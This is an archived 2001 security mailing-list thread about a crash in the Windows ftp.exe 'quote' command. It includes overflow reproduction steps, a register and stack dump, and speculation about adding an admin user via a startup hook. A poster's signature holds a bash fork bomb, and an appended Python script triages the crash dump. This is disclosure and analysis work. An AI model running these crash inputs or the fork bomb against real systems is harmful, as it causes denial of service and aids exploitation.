Vulnerability Development mailing list archives

Re: ftp.exe buffer overflow ?


From: Benjamin Branch <ben () ACMECLICK COM>
Date: Thu, 15 Feb 2001 12:51:29 -0600

I found that the easiest way to do this is by using the -s:filename option
with ftp.exe.  I did the following in a text file and got it to dump the
stack.

1. Made a test file with the following command in it:
quote site exec A x 1000
2. Ran ftp.exe with the following options:
ftp -n -s:test.ftp ftp.example.com
Soon afterwards I received this little message.

FTP caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=00000000 CS=017f EIP=41414141 EFLGS=00010206
EBX=00000000 SS=0187 ESP=0056f5f4 EBP=01008820
ECX=0056f3e8 DS=0187 ESI=010072b8 FS=3b87
EDX=0056e9a8 ES=0187 EDI=7800bb50 GS=5756
Bytes at CS:EIP:

Stack dump:
41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141

I think that this confirms Mr. Hassell's post.  If I were to exploit this
on a machine I think it would be easiest done by putting this in the
startup somewhere on an ethernet-based machine.  Has this been tested on NT?
If so, the only thing that would need to be done is to have this run on
startup and then have it add a user with admin privs.  I'm not big on
writing exploits, so I could be wrong on this.

I am also running Win 98 build 4.10.2222 A.  So it looks like it is
exploitable on Win98 and Win98 SE.  I just tried in Windows 2000 Server with
SP1 and it seemed to have no effect on the server.


Benjamin
----- Original Message -----
From: "Riley Hassell" <riley () EEYE COM>
To: <VULN-DEV () SECURITYFOCUS COM>
Sent: Monday, February 12, 2001 12:36 AM
Subject: Re: ftp.exe buffer overflow ?


This is actually overflowable:
In my first post I put a note at the bottom showing that sending a large
buffer with 'A's overwrites the EIP.

Example:
ftp example.com
...login...
quote site exec AAAAAAAA.....        <--- 1000x'A'

I'm on build 2195 and it directly overwrites the EIP.


----- Original Message -----
From: "Michal Zalewski" <lcamtuf () BOS BINDVIEW COM>
To: <VULN-DEV () SECURITYFOCUS COM>
Sent: Sunday, February 11, 2001 5:45 PM
Subject: Re: ftp.exe buffer overflow ?


On Mon, 12 Feb 2001, Egemen Tas wrote:

> This bug is different from the ones you mentioned..
> This is the bug in MS FTP Client's QUOTE command.

MS FTP client is surprisingly similar to BSDish ftp client, containing -
for example - some similar strings in its binary. It's been discussed on
numerous forums long time ago (google.com, search for: "Regents of the
University of California" ftp microsoft client). Thus, I bet this is the
same as the bug in BSDish ftp client (format bug in quote command), and is
caused by very similar code.

> In my opinion this may be overflowable (because the error occurs in the
> Stack Segment!) (I may be wrong)

No, never. I mean this is exploitable, but it is not an overflow and has
nothing to do with stack segment.

> but does not pose great security risk. Because ftp.exe runs with the
> credentials of currently logged on user.

Right =)

--
_______________________________________________________
Michal Zalewski [lcamtuf () bos bindview com] | [security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=--=> Did you know that clones never use mirrors? <=--=
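Added example, not part of any message in this thread: a small Python crash-triage script that parses a Win9x-style "invalid page fault" dialog like the one Benjamin quoted and reports which registers and stack slots are made entirely of the fill byte (0x41, 'A'). That check is what separates the two readings argued above: EIP equal to the fill pattern means the saved return address was overwritten by input, while the pattern showing up only in data registers or stack slots shows that input reached the stack without demonstrating control of execution. Both dumps are constructed test inputs: the first copies the dialog quoted in the thread, the second is a hypothetical crash (not from the thread) where only EAX and two stack words hold the pattern. The fill byte is a parameter, so the same parser works for any single-byte filler.

```python
import re

# Constructed input 1: the Win9x "invalid page fault" dialog text that Benjamin
# quoted in the thread, embedded here as test data for the parser.
FAULT_EIP_OVERWRITTEN = """FTP caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=00000000 CS=017f EIP=41414141 EFLGS=00010206
EBX=00000000 SS=0187 ESP=0056f5f4 EBP=01008820
ECX=0056f3e8 DS=0187 ESI=010072b8 FS=3b87
EDX=0056e9a8 ES=0187 EDI=7800bb50 GS=5756
Bytes at CS:EIP:

Stack dump:
41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
"""

# Constructed input 2 (hypothetical, not from the thread): EIP is a plausible
# code address and only EAX plus two stack slots hold the fill pattern, i.e. a
# crash that does not by itself show control of execution.
FAULT_DATA_ONLY = """FTP caused an invalid page fault in
module KERNEL32.DLL at 017f:bff7b9a6.
Registers:
EAX=41414141 CS=017f EIP=bff7b9a6 EFLGS=00010246
EBX=00000000 SS=0187 ESP=0056f5f4 EBP=0056f610
ECX=00000000 DS=0187 ESI=010072b8 FS=3b87
EDX=0056e9a8 ES=0187 EDI=7800bb50 GS=5756
Bytes at CS:EIP:
8b 00 c3 90 90 90 90 90 90 90 90 90 90 90 90 90
Stack dump:
0056f624 bff7a3b0 41414141 00000000 41414141 0056f700 00000000 00000000
"""

REG_RE = re.compile(r"\b([A-Z]{2,5})=([0-9a-fA-F]{4,8})\b")   # NAME=hex pairs
FAULT_RE = re.compile(r"\bat ([0-9a-fA-F]{4}):([0-9a-fA-F]{8})\b")  # "at SEG:OFF."
WORD_RE = re.compile(r"[0-9a-fA-F]{8}")                        # one stack dword


def parse_fault(text):
    """Split the dialog text into (fault offset, register dict, stack words)."""
    regs, stack, fault_off, in_stack = {}, [], None, False
    for line in text.splitlines():
        if line.startswith("Stack dump:"):
            in_stack = True
            continue
        if in_stack:
            stack.extend(int(w, 16) for w in line.split() if WORD_RE.fullmatch(w))
            continue
        m = FAULT_RE.search(line)
        if m:
            fault_off = int(m.group(2), 16)
        for name, val in REG_RE.findall(line):
            regs[name] = int(val, 16)
    return fault_off, regs, stack


def fill_word(fill_byte, width=4):
    """32-bit value a register shows when every one of its bytes is fill_byte."""
    return int.from_bytes(bytes([fill_byte]) * width, "little")


def triage(text, fill_byte=0x41):
    """Report which registers and stack slots consist entirely of fill_byte.

    EIP == fill pattern is the observation the thread treats as proof that the
    return address was overwritten; the pattern in data registers or stack
    slots alone only shows that input reached the stack.
    """
    fault_off, regs, stack = parse_fault(text)
    marker = fill_word(fill_byte)
    controlled = sorted(name for name, val in regs.items() if val == marker)
    eip_controlled = regs.get("EIP") == marker
    return {
        "fault_offset": fault_off,
        "controlled_registers": controlled,
        "stack_pattern_words": sum(1 for w in stack if w == marker),
        "stack_words": len(stack),
        "verdict": ("EIP fully overwritten by fill pattern"
                    if eip_controlled else "EIP not pattern-controlled"),
    }


if __name__ == "__main__":
    for label, dump in (("thread dump", FAULT_EIP_OVERWRITTEN),
                        ("constructed data-only crash", FAULT_DATA_ONLY)):
        print(label, triage(dump))
```

For the quoted dialog the script reports EIP as the only pattern-controlled register and all 16 dumped stack words equal to 0x41414141; for the constructed second dump it reports only EAX and two stack slots, with EIP untouched. When a crash report of this kind lands on a triage queue, that distinction is the first thing worth recording before anyone argues about exploitability.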